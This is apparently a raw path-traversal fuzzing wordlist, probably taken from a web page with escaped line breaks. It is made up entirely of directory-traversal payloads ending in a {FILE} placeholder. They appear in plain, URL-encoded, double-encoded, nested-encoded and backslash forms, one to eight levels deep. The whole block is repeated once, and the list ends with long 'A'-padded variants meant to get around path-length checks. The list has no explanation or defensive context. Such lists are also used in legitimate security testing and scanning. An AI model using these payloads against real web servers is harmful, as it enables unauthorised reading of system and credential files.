%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
